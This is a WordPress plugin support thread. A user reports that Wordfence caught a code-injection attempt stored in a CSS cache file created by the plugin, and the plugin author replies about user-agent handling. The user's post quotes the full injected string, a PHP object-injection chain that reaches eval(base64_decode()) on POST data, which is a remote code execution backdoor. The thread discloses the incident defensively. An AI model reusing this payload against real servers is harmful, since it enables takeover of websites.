Sanitize your inputs

  • joerns

    (@joerns)


    7 years, 11 months ago

    Wordfence notified me about some tried code injection in a css file created by this plugin:

    
/* Original-Document: https://fonts.googleapis.com/css?family=Libre+Franklin%3A300%2C300i%2C400%2C400i%2C600%2C600i%2C800%2C800i&subset=latin%2Clatin-ext for: }__test|O:21:\"JDatabaseDriverMysqli\":3:{s:4:\"\\0\\0\\0a\";O:17:\"JSimplepieFactory\":0:{}s:21:\"\\0\\0\\0disconnectHandlers\";a:1:{i:0;a:2:{i:0;O:9:\"SimplePie\":5:{s:8:\"sanitize\";O:20:\"JDatabaseDriverMysql\":0:{}s:5:\"cache\";b:1;s:19:\"cache_name_function\";s:6:\"assert\";s:10:\"javascript\";i:9999;s:8:\"feed_url\";s:54:\"eval(base64_decode($_POST[111]));JFactory::get();exit;\";}i:1;s:4:\"init\";}}s:13:\"\\0\\0\\0connection\";i:1;}𝌆 replaces: 8 , version: 4 */

    So I guess at some point your input should be sanitized 😉

    BTW, do you think user agent differentiation is really required? Because there are very very many different user agent strings…

Viewing 1 replies (of 1 total)
  • Plugin Author E. Marten

    (@emarten)

    7 years, 11 months ago

    Hey, thanks for your feedback.
    Google delivers different css files and font-formats depending on the browser agent-string. But I am already grouping Agents so the load of forms will decrease.
    The plugin deletes unused css already.
    Greets, Eric

Viewing 1 replies (of 1 total)

The topic ‘Sanitize your inputs’ is closed to new replies.